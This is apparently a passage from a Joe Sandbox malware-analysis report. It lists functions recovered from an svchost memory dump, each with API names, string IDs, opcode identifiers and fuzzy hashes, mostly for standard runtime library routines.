                                                                                                                                                                                                                                                control_flow_graph 547 13de2727520-13de2727526 548 13de2727561-13de272756b 547->548 549 13de2727528-13de272752b 547->549 552 13de2727688-13de272769d 548->552 550 13de272752d-13de2727530 549->550 551 13de2727555-13de2727594 call 13de2727bd0 549->551 553 13de2727532-13de2727535 550->553 554 13de2727548 __scrt_dllmain_crt_thread_attach 550->554 567 13de2727662 551->567 568 13de272759a-13de27275af call 13de2727a64 551->568 555 13de272769f 552->555 556 13de27276ac-13de27276c6 call 13de2727a64 552->556 558 13de2727541-13de2727546 call 13de2727b14 553->558 559 13de2727537-13de2727540 553->559 562 13de272754d-13de2727554 554->562 560 13de27276a1-13de27276ab 555->560 570 13de27276c8-13de27276f9 call 13de2727b8c call 13de2727a2c call 13de2727f14 call 13de2727d30 call 13de2727d54 call 13de2727bbc 556->570 571 13de27276fb-13de272772c call 13de2727d90 556->571 558->562 572 13de2727664-13de2727679 567->572 579 13de27275b5-13de27275c6 call 13de2727ad4 568->579 580 13de272767a-13de2727687 call 13de2727d90 568->580 570->560 581 13de272773d-13de2727743 571->581 582 13de272772e-13de2727734 571->582 600 13de2727617-13de2727621 call 13de2727d30 579->600 601 13de27275c8-13de27275ec call 13de2727ed8 call 13de2727a1c call 13de2727a48 call 13de272bd7c 579->601 580->552 587 13de2727745-13de272774f 581->587 588 13de272778a-13de27277a0 call 13de27232a0 581->588 582->581 586 13de2727736-13de2727738 582->586 594 13de272782b-13de2727838 586->594 595 13de2727751-13de2727759 587->595 596 13de272775b-13de2727769 call 13de2736380 587->596 608 13de27277a2-13de27277a4 588->608 609 13de27277d8-13de27277da 588->609 597 13de272776f-13de2727784 call 13de2727520 595->597 596->597 613 13de2727821-13de2727829 596->613 597->588 597->613 600->567 620 13de2727623-13de272762f call 13de2727d80 600->620 601->600 649 13de27275ee-13de27275f5 __scrt_dllmain_after_initialize_c 601->649 608->609 617 13de27277a6-13de27277c8 call 13de27232a0 call 13de2727688 608->617 610 13de27277e1-13de27277f6 call 13de2727520 609->610 611 13de27277dc-13de27277df 609->611 610->613 629 13de27277f8-13de2727802 610->629 611->610 611->613 613->594 617->609 644 13de27277ca-13de27277d2 call 13de2736380 617->644 637 13de2727631-13de272763b call 13de2727c98 620->637 638 13de2727655-13de2727660 620->638 634 13de272780d-13de272781d call 13de2736380 629->634 635 13de2727804-13de272780b 629->635 634->613 635->613 637->638 650 13de272763d-13de272764b 637->650 638->572 644->609 649->600 651 13de27275f7-13de2727614 call 13de272bd38 649->651 650->638 651->600
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 190073905-0
                                                                                                                                                                                                                                                • Opcode ID: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction ID: f8c51aa5fac1f9f4583ff23cabd440589c9404a7d004e64d94a366c9525f117d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE81B5B3A046418EFB50BB6ABA423E96FF4A785780F544035DA494F796EB38CB45F700
                                                                                                                                                                                                                                                Function 0000013DE272A148 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                • Opcode ID: 1bda5a7f51937e5fba9747c90859e34dfa5f89533a2a1b8d1dea998784ab284d
                                                                                                                                                                                                                                                • Instruction ID: 8046d4e9ae6fd3bc76c15d9bda77b13380ab055a3b6b477710ca1f3904310728
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1bda5a7f51937e5fba9747c90859e34dfa5f89533a2a1b8d1dea998784ab284d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B031A072612740A9EF62BB42B8007D66BF4BB88BA0F690635DD5D4F390DF39C685A310
                                                                                                                                                                                                                                                Function 0000013DE27237A4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                                                                                                                                                                • String ID: wr
                                                                                                                                                                                                                                                • API String ID: 1092925422-2678910430
                                                                                                                                                                                                                                                • Opcode ID: d02d62af4a13f9151a1d64f675f2e823d7ed1e1e396348dfe74f8be14938124b
                                                                                                                                                                                                                                                • Instruction ID: 56ebee0f63c56cacf9816999bb7db2958f6d177600289cf9108ca15d13cdef78
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d02d62af4a13f9151a1d64f675f2e823d7ed1e1e396348dfe74f8be14938124b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3113976704B418AFF25BB12F4496A96BB0FB88B95F240039DE890BB94EF3DC644D714
                                                                                                                                                                                                                                                Function 0000013DE27214A4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 83memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$Free
                                                                                                                                                                                                                                                • String ID: C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                • API String ID: 3168794593-4180442734
                                                                                                                                                                                                                                                • Opcode ID: 8f6c8013f26ca493c8b85487be1e8632cd5ea831c810228ac57a4b2b7c934696
                                                                                                                                                                                                                                                • Instruction ID: 8e5febeb5e99409d8a8def2e66279fb4802b0910a867b072e1e71e6861aa4715
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f6c8013f26ca493c8b85487be1e8632cd5ea831c810228ac57a4b2b7c934696
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E316BB790DBC08EE352BB66B8552992FB0F789F40F298026DA840B347EA2597059744
                                                                                                                                                                                                                                                Function 0000013DE272D510 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                                • Opcode ID: 5a5575a5d1708c946e79aad68248bc2e3b8df018e302dfb520b8908bc7679156
                                                                                                                                                                                                                                                • Instruction ID: a86168cc86fc74653fbe926c85dd27019b1feefbbb8973bbe713358a280c0fcd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a5575a5d1708c946e79aad68248bc2e3b8df018e302dfb520b8908bc7679156
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B11D3B27052508EFA54B3367A553EA2AF66B447F4F140334E8360F7DADEA8C741A340
                                                                                                                                                                                                                                                Function 0000013DE27219A4 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 517849248-0
                                                                                                                                                                                                                                                • Opcode ID: 8727d58878f2a869f14b8fd26c384ee344685f44cd71b3c6aa4d19fd6db2488a
                                                                                                                                                                                                                                                • Instruction ID: 0e1045e0901578caeed5dd1647d26434383841e14dafe434a74e6992654085d4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8727d58878f2a869f14b8fd26c384ee344685f44cd71b3c6aa4d19fd6db2488a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56016971708A408AEB10FB12B8987996BB1F788BC0F984034DE5A4B755DF3CCB898704
                                                                                                                                                                                                                                                Function 0000013DE2721A48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                                                                                                                                                                                • String ID: \\?\
                                                                                                                                                                                                                                                • API String ID: 2719912262-4282027825
                                                                                                                                                                                                                                                • Opcode ID: 5d436592c77a9924c69bcb50891f68179583d79dfa63631e028aef339bed858e
                                                                                                                                                                                                                                                • Instruction ID: efa53308daf18d89a0362a8febf9d24a61156a96b651ecdbfbafc5bfc733d08c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d436592c77a9924c69bcb50891f68179583d79dfa63631e028aef339bed858e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6F0C2723086809AEB20FB60F8D47DA6B71F758B88F984030CA494A959DF7CC78CDB04
                                                                                                                                                                                                                                                Function 0000013DE2723058 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CombinePath
                                                                                                                                                                                                                                                • String ID: \\.\pipe\
                                                                                                                                                                                                                                                • API String ID: 3422762182-91387939
                                                                                                                                                                                                                                                • Opcode ID: 230e05f875843765b10c94681cacd2039b66fa3fae77185737d73b0c30566c8e
                                                                                                                                                                                                                                                • Instruction ID: 50fb1810f9b093a21abd42f558bc982d0d86821917b4bcc0f5ccdd06ec671138
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 230e05f875843765b10c94681cacd2039b66fa3fae77185737d73b0c30566c8e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33F08271718B8085EA14BB13B9141996B71EB48FD0F248030EE6A0BB18DF3CC7859714
                                                                                                                                                                                                                                                Function 0000013DE272C208 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                • Opcode ID: 0e03656a98ecf47c8c70bd094229c94189d23a90474f93e2876379b06086d007
                                                                                                                                                                                                                                                • Instruction ID: 338c25e0141dea10749522d8e0e6d7b3c03611f50317a1df8eb893623ce3689d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e03656a98ecf47c8c70bd094229c94189d23a90474f93e2876379b06086d007
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56F06272215A0485EB11BB64F85539A6B70EB85B61F640239D66A4D1F4DF3CC348A354
                                                                                                                                                                                                                                                Function 0000013DE27250E0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2882836952-0
                                                                                                                                                                                                                                                • Opcode ID: d320431a3885b97cf1102f80532d88567ca490bad17f23be6033182695dcdf12
                                                                                                                                                                                                                                                • Instruction ID: 6fa04ed38e459616faa87eb6989cece4c95a83529e54b4c45d9d4ea689695fb0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d320431a3885b97cf1102f80532d88567ca490bad17f23be6033182695dcdf12
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7802EC73219B848AE764EB59F49039ABBB1F3C4794F104125EA8E87BA9DF7CC544DB00
                                                                                                                                                                                                                                                Function 0000013DE2734674 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction ID: 7cdfbae7086af1f9605070ff64a6857c7698b3e0db0677f3c1c4df5b5daeb4f5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD11E937A10A018DF66F3969F4713E51CB06B59378F340634AAB70E6E7CE248BC16104
                                                                                                                                                                                                                                                Function 0000013DE2728580 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                • Opcode ID: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction ID: 7e03c071ae3d63c6aad6873193658a43c80a1f58e46b67610b6de0bd332fdea8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8951CC733116098EEB54FF95F444BA83BB2F744B88F508134EA8A4B789DB7ACA41D710
                                                                                                                                                                                                                                                Function 0000013DE272AFC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                • Opcode ID: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction ID: 63fda26abc6198676af7175dbb78f8b0b78570552283441e53f84caea25de0d8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 67619DB3504BC48AE771AF15F4403DABBB4F785B88F045625EB990BB99DB38C294DB00
                                                                                                                                                                                                                                                Function 0000013DE27325C8 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2718003287-0
                                                                                                                                                                                                                                                • Opcode ID: ef5328ec8df5305a5bebb05340c2e4b6dc17e77d604934f64985ec379b581ae8
                                                                                                                                                                                                                                                • Instruction ID: 8381c4611c9bd71c1586b6f113c483f884f37dcbfecbfe0024d75a6f161059a6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ef5328ec8df5305a5bebb05340c2e4b6dc17e77d604934f64985ec379b581ae8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6BD1B172714A808EE722EF65F4403EC3BB1F754B98F244225CE5DABB99DA34CA46D340
                                                                                                                                                                                                                                                Function 0000013DE2727970 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                                                • Opcode ID: c25137996cf865269d3dc01569cfdf526b316795659beb4b1a68d386b57b9efa
                                                                                                                                                                                                                                                • Instruction ID: 264a528a6f3f269d4b5c4d99049e3f75b3c1b06e50a56728da50e3d8e8426a95
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c25137996cf865269d3dc01569cfdf526b316795659beb4b1a68d386b57b9efa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 69112A32714F018AEB00EF60F8553E837B4F719758F440E31DA6D8A7A8DB78D2A89340
                                                                                                                                                                                                                                                Function 0000013DE2722544 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileType
                                                                                                                                                                                                                                                • String ID: \\.\pipe\
                                                                                                                                                                                                                                                • API String ID: 3081899298-91387939
                                                                                                                                                                                                                                                • Opcode ID: 2214ffb8d2229323086ad34a8b531e28ba158b85d1d3dbad5c7c70fb1dba52b7
                                                                                                                                                                                                                                                • Instruction ID: bbc7c948219a7feb5bbdef7df0ef4cc6af5694843480fbd47bc870989721aafd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2214ffb8d2229323086ad34a8b531e28ba158b85d1d3dbad5c7c70fb1dba52b7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7071B1B7204B8289EB35FE25B8443EA7BB5F384784F55003ADE094BB89DE35CB05A700
                                                                                                                                                                                                                                                Function 0000013DE2732C60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                • String ID: U
                                                                                                                                                                                                                                                • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                • Opcode ID: 6a2d2f89dbe45a9fea545bcb4aa06eef1d3c7bdcbbdd9a8edf910a903994b9b4
                                                                                                                                                                                                                                                • Instruction ID: 9c0505371855fa0117c56295c7cbb962a51d66c403fcb1eddba89883083fd92f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a2d2f89dbe45a9fea545bcb4aa06eef1d3c7bdcbbdd9a8edf910a903994b9b4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C41A272225A408ADB61BF25F8443EA6BB0F398784F644031EE4E8B798EB3CC641D740
                                                                                                                                                                                                                                                Function 0000013DE2728A58 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                • Opcode ID: d7810ab3a0ec9818877cf1b3e283a106e6e962497adc233d094785ed36f44b7e
                                                                                                                                                                                                                                                • Instruction ID: 8fa5da22416db5681e7117c4a4a9092644612ce5a02032eb9614756879cedc31
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7810ab3a0ec9818877cf1b3e283a106e6e962497adc233d094785ed36f44b7e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E113072219B8482EB61AF15F4402997BF4F788B94F584220DF8D0B754DF3DC651D704
                                                                                                                                                                                                                                                Function 0000013DE2721BFC Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 756756679-0
                                                                                                                                                                                                                                                • Opcode ID: 1e98e18f6346a7606d876eb22bc804523d63b476fed3d5047e07684f33477b56
                                                                                                                                                                                                                                                • Instruction ID: c14f526e8716fda944a528217fc1074e69e92b4fded1d661f73d1f4e681b3129
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e98e18f6346a7606d876eb22bc804523d63b476fed3d5047e07684f33477b56
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60118F76A02B4489EA05FB66B4042A96BB5FB89FC0F1C5034DE4D4B766DF38C682E300
                                                                                                                                                                                                                                                Function 0000013DE2721268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1617791916-0
                                                                                                                                                                                                                                                • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
